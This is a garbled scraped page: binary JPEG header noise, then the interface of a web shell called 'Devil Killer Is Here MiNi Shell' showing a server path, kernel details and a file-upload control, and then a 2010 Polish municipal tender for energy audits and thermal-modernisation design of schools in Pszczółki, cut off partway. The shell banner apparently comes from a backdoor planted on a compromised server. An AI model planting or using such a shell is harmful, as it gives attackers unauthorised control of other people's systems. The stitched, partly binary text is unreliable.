JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100922/261227-N-2010.html

<p class="kh_header"><b>Pszczółki: Sporządzenie audytu energetycznego oraz dokumentacji projektowej na termomodernizację dla wybranych placówek oświatowych na terenie Gminy Pszczółki.</b><br>
<b>Numer ogłoszenia: 261227 - 2010; data zamieszczenia: 22.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pszczółki , ul. Pomorska 18, 83-032 Pszczółki, woj. pomorskie, tel. 058 6839128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pszczolki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie audytu energetycznego oraz dokumentacji projektowej na termomodernizację dla wybranych placówek oświatowych na terenie Gminy Pszczółki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie audytu energetycznego dla Publicznego Gimnazjum w Pszczółkach oraz audytu energetycznego i dokumentacji projektowej na termomodernizację budynków: Szkoły Podstawowej im. Boh. Ziemi Gdańskiej, Przedszkola Gminnego Pszczółka Maja oraz sali gimnastycznej przy Publicznym Gimnazjum w Pszczółkach.
Zakres  prac obejmuje:
CZĘŚĆ I 
1. Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów(Dz. U z 2008r nr 223 poz.1459 ze zmianami)  w 2 egzemplarzach oraz w wersji elektronicznej dla budynku starej części Publicznego Gimnazjum w Pszczółkach - kubatura obiektu 4.028 m3, pow. użytkowa 908,8 m2;
2.	
1) Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r. Nr 223, poz.1459 ze zmianami) w 2 egzemplarzach oraz w wersji elektronicznej dla sali gimnastycznej przy Publicznym Gimnazjum w Pszczółkach - kubatura obiektu 3.888 m3, pow. użytkowa 654,51 m2;
2) Ocenę techniczną istniejącego obiektu pod kątem zamierzenia termomodernizacyjnego w 2 egzemplarzach oraz w wersji elektronicznej;
3) Sporządzenie inwentaryzacji budowlano-architektonicznej w zakresie niezbędnym dla opracowania audytu energetycznego 
w 2 egzemplarzach oraz w wersji elektronicznej;
4) Sporządzenie dokumentacji projektowej - projektów budowlanych (w 6 egzemplarzach oraz w wersji elektronicznej) i wykonawczych (w 3 egzemplarzach oraz w wersji elektronicznej), wszystkich branż (architektura, konstrukcje, wod-kan, sanitarne-wentylacyjne, c.w.u., c.o., elektrycznej, elewacje, wymiana stolarki, instalacja odgromowa itp.) w zakresie dostosowanym do prac wynikających z audytu energetycznego, zgodnie z wymogami ustawy z dnia 07.04.1994 r. Prawo Budowlane oraz obowiązującymi normami, aktualnymi warunkami technicznymi i innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu;
5) Sporządzenie kosztorysu inwestorskiego wraz z przedmiarem robót w 2 egzemplarzach oraz w wersji elektronicznej (przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazanie właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót);
6) Sporządzenie specyfikacji technicznej wykonania i odbioru robót w 2 egzemplarzach oraz w wersji elektronicznej;
7) Nadzór autorski nad realizacją robót zawartych w realizowanej dokumentacji (10 pobytów - wycenione w ramach wynagrodzenia za opracowanie dokumentacji).
CZĘŚĆ II
1) Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r. Nr 223, poz.1459 ze zmianami) w 2 egzemplarzach oraz w wersji elektronicznej dla budynków Szkoły Podstawowej im Bohaterów Ziemi Gdańskiej w Pszczółkach - kubatura obiektu 27.086,10 m3, pow. użytkowa 6.009,37 m2 składającego się z: 
- budynku starej szkoły - kubatura 6749,7m3, pow. użytkowa 1393,36m2,
- sali gimnastycznej - kubatura 7354 m3, pow. użytkowa 926,6 m2,
- segmentu administracyjno - kulturalno - żywieniowego - kubatura 5005m3, pow. użytkowa 1188,3 m2,
- segmentu 15 sal - kubatura 4559 m3, pow. użytkowa 1623,93 m2,
- łącznik Ł-1 duży - kubatura 3284 m3, pow. użytkowa 833,28 m2,
- łącznik Ł-2 mały - kubatura 134,4 m3, pow. użytkowa 43,9 m2;
2) Ocenę techniczną istniejącego obiektu pod kątem zamierzenia termomodernizacyjnego w 2 egzemplarzach oraz w wersji elektronicznej;
3) Sporządzenie inwentaryzacji budowlano-architektonicznej w zakresie niezbędnym dla opracowania audytu energetycznego w 2 egzemplarzach oraz w wersji elektronicznej;
4) Sporządzenie dokumentacji projektowej - projektów budowlanych (w 6 egzemplarzach oraz w wersji elektronicznej) i wykonawczych (w 3 egzemplarzach oraz w wersji elektronicznej) wszystkich branż (architektura, konstrukcje, wod-kan, sanitarno-wentylacyjne, c.w.u., c.o., elektrycznej, elewacje, wymiana stolarki, instalacja odgromowa itp.) w zakresie dostosowanym do prac wynikających z audytu energetycznego, zgodnie z wymogami ustawy z dnia 07.04.1994 r. Prawo Budowlane oraz obowiązującymi normami, aktualnymi warunkami technicznymi i innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu;
5) Sporządzenie kosztorysu inwestorskiego wraz z przedmiarem robót w 2 egzemplarzach oraz w wersji elektronicznej (przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazanie właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót);
6) Sporządzenie specyfikacji technicznej wykonania i odbioru robót w 2 egzemplarzach oraz w wersji elektronicznej;
7) Nadzór autorski nad realizacją robót zawartych w realizowanej dokumentacji (10 pobytów- wycenione w ramach wynagrodzenia za opracowanie dokumentacji). 
CZĘŚĆ III
1) Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r. Nr 223, poz.1459 ze zmianami) w 2 egzemplarzach oraz w wersji elektronicznej dla budynku Przedszkola Gminnego Pszczółka Maja w Pszczółkach - kubatura obiektu 2991m3, pow. użytkowa 675,37 m2;
2) Ocenę techniczną istniejącego obiektu pod kątem zamierzenia termomodernizacyjnego w 2 egzemplarzach oraz w wersji elektronicznej;
3)Sporządzenie inwentaryzacji budowlano-architektonicznej w zakresie niezbędnym dla opracowania audytu energetycznego w 2 egzemplarzach oraz w wersji elektronicznej;
4) Sporządzenie dokumentacji projektowej - projektów budowlanych (w 6 egzemplarzach oraz w wersji elektronicznej) i wykonawczych (w 3 egzemplarzach oraz w wersji elektronicznej) wszystkich branż (architektura, konstrukcje, wod-kan, sanitarno-wentylacyjne, c.w.u., c.o., elektrycznej, elewacje, wymiana stolarki, instalacja odgromowa itp.) w zakresie dostosowanym do prac wynikających z audytu energetycznego, zgodnie z wymogami ustawy z dnia 07.04.1994r. Prawo Budowlane oraz obowiązującymi normami, aktualnymi warunkami technicznymi i innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu;
5) Sporządzenie kosztorysu inwestorskiego wraz z przedmiarem robót w 2 egzemplarzach oraz w wersji elektronicznej (przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazanie właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem 
i zestawieniem ilości jednostek przedmiarowych robót);
6) Sporządzenie specyfikacji technicznej wykonania i odbioru robót w 2 egzemplarzach oraz w wersji elektronicznej;
7) Nadzór autorski nad realizacją robót zawartych w realizowanej dokumentacji (10 pobytów - wycenione w ramach wynagrodzenia za opracowanie dokumentacji).

Wykonawca przeniesie na Zamawiającego prawa autorskie wraz z własnością wszystkich egzemplarzy dokumentacji (w tym w wersji elektronicznej), objętych przedmiotem zamówienia.

Wskazane jest, aby Wykonawca dokonał wizji lokalnej miejsc przewidzianych na wykonanie usługi.

W dokumentacji należy uwzględnić stan techniczny poszczególnych elementów obiektów z dokładnym określeniem sposobu ich naprawy, wzmocnienia, zabezpieczenia oraz niezbędnych wymian.

Przedmiot zamówienia musi być objęty gwarancją i rękojmią 36 miesięcy od daty odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 71.31.43.00-5, 71.22.10.00-3, 71.24.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali co najmniej 1 zadanie z zakresu audytu energetycznego budynków użyteczności publicznej o kubaturze minimum 4.000 m3oraz 1 zadanie z zakresu dokumentacji projektowej budynków użyteczności publicznej o kubaturze minimum 4.000 m3 w oparciu o wykonany audyt energetyczny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami posiadającymi wymagane uprawnienia do wykonywania robót, tj. jedną osobą posiadającą kwalifikacje do wykonywania opracowań szczegółowych audytów energetycznych oraz osobami posiadającymi uprawnienia do projektowania w specjalności konstrukcyjno - budowlanej, elektrycznej i sanitarnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony druk oferty - o treści odpowiadającej drukowi Oferty stanowiącej część II SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie z art. 144 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podanych warunków jej wprowadzenia.
1) Zmiana terminu zakończenia robót,
a) zmiany będące następstwem działania innych organów, np. eksploatatorów infrastruktury, właścicieli gruntów pod inwestycję, organy administracji poprzez przekroczenie terminów wydania niezbędnych do prowadzenia inwestycji: decyzji, zezwoleń, uzgodnień, odmowa wydania tychże decyzji, zezwoleń i uzgodnień, która nie nastąpiła z winy Wykonawcy;
b) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, wskutek których niemożliwe będzie ukończenie zamówienia w terminie umownym,
c) dopuszcza się skrócenie terminu realizacji przedmiotu umowy, w przypadku wcześniejszego zakończenia prac.
2) Inne zmiany spowodowane następującymi okolicznościami:
a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne spełniające warunki określone w SIWZ. Zmiana ta nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
b) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
c) zmiana obowiązującej stawki VAT;
d) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy, na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
3) Wszystkie powyższe zmiany stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody.
4) Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a) zmiana danych teleadresowych,
b) zmiana danych związanych z obsługą administracyjno- organizacyjną umowy (np. zmiana nr rachunku bankowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pszczolki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Pszczółkach
83-032 Pszczółki, ul. Pomorska 18
pokój nr 1 - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 11:00, miejsce: Urząd Gminy w Pszczółkach
83-032 Pszczółki, ul. Pomorska 18
pokój nr 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzenie audytu energetycznego i dokumentacji projektowej na termomodernizację budynku dla Publicznego Gimnazjum w Pszczółkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 
1. Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów(Dz. U z 2008r nr 223 poz.1459 ze zmianami)  w 2 egzemplarzach oraz w wersji elektronicznej dla budynku starej części Publicznego Gimnazjum w Pszczółkach - kubatura obiektu 4.028 m3, pow. użytkowa 908,8 m2;
2.	
1) Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r. Nr 223, poz.1459 ze zmianami) w 2 egzemplarzach oraz w wersji elektronicznej dla sali gimnastycznej przy Publicznym Gimnazjum w Pszczółkach - kubatura obiektu 3.888 m3, pow. użytkowa 654,51 m2;
2) Ocenę techniczną istniejącego obiektu pod kątem zamierzenia termomodernizacyjnego w 2 egzemplarzach oraz w wersji elektronicznej;
3) Sporządzenie inwentaryzacji budowlano-architektonicznej w zakresie niezbędnym dla opracowania audytu energetycznego w 2 egzemplarzach oraz w wersji elektronicznej;
4) Sporządzenie dokumentacji projektowej - projektów budowlanych (w 6 egzemplarzach oraz w wersji elektronicznej) i wykonawczych (w 3 egzemplarzach oraz w wersji elektronicznej), wszystkich branż (architektura, konstrukcje, wod-kan, sanitarne-wentylacyjne, c.w.u., c.o., elektrycznej, elewacje, wymiana stolarki, instalacja odgromowa itp.) w zakresie dostosowanym do prac wynikających z audytu energetycznego, zgodnie z wymogami ustawy z dnia 07.04.1994 r. Prawo Budowlane oraz obowiązującymi normami, aktualnymi warunkami technicznymi i innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu;
5) Sporządzenie kosztorysu inwestorskiego wraz z przedmiarem robót w 2 egzemplarzach oraz w wersji elektronicznej (przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazanie właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót);
6) Sporządzenie specyfikacji technicznej wykonania i odbioru robót w 2 egzemplarzach oraz w wersji elektronicznej;
7) Nadzór autorski nad realizacją robót zawartych w realizowanej dokumentacji (10 pobytów - wycenione w ramach wynagrodzenia za opracowanie dokumentacji).

Wykonawca przeniesie na Zamawiającego prawa autorskie wraz z własnością wszystkich egzemplarzy dokumentacji (w tym w wersji elektronicznej), objętych przedmiotem zamówienia.

Wskazane jest, aby Wykonawca dokonał wizji lokalnej miejsc przewidzianych na wykonanie usługi.

W dokumentacji należy uwzględnić stan techniczny poszczególnych elementów obiektów z dokładnym określeniem sposobu ich naprawy, wzmocnienia, zabezpieczenia oraz niezbędnych wymian.

Przedmiot zamówienia musi być objęty gwarancją i rękojmią 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-3, 71.31.43.00-5, 71.22.10.00-3, 71.24.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie audytu energetycznego i dokumentacji projektowej na termomodernizację budynku dla Szkoły Podstawowej im. Boh. Ziemi Gdańskiej w Pszczółkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II
1) Sporządzenie audytu energetycznego spełniającego wymogi ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r. Nr 223, poz.1459 ze zmianami) w 2 egzemplarzach oraz w wersji elektronicznej dla budynków Szkoły Podstawowej im Bohaterów Ziemi Gdańskiej w Pszczółkach - kubatura obiektu 27.086,10 m3, pow. użytkowa 6.009,37 m2 składającego się z: 
- budynku starej szkoły - kubatura 6749,7m3, pow. użytkowa 1393,36m2,
- sali gimnastycznej - kubatura 7354 m3, pow. użytkowa 926,6 m2,
- segmentu administracyjno - kulturalno - żywieniowego - kubatura 5005m3, pow. użytkowa 1188,3 m2,
- segmentu 15 sal - kubatura 4559 m3, pow. użytkowa 1623,93 m2,
- łącznik Ł-1 duży - kubatura 3284 m3, pow. użytkowa 833,28 m2,
- łącznik Ł-2 mały - kubatura 134,4 m3, pow. użytkowa 43,9 m2;
2) Ocenę techniczną istniejącego obiektu pod kątem zamierzenia termomodernizacyjnego w 2 egzemplarzach oraz w wersji elektronicznej;
3) Sporządzenie inwentaryzacji budowlano-architektonicznej w zakresie niezbędnym dla opracowania audytu energetycznego w 2 egzemplarzach oraz w wersji elektronicznej;
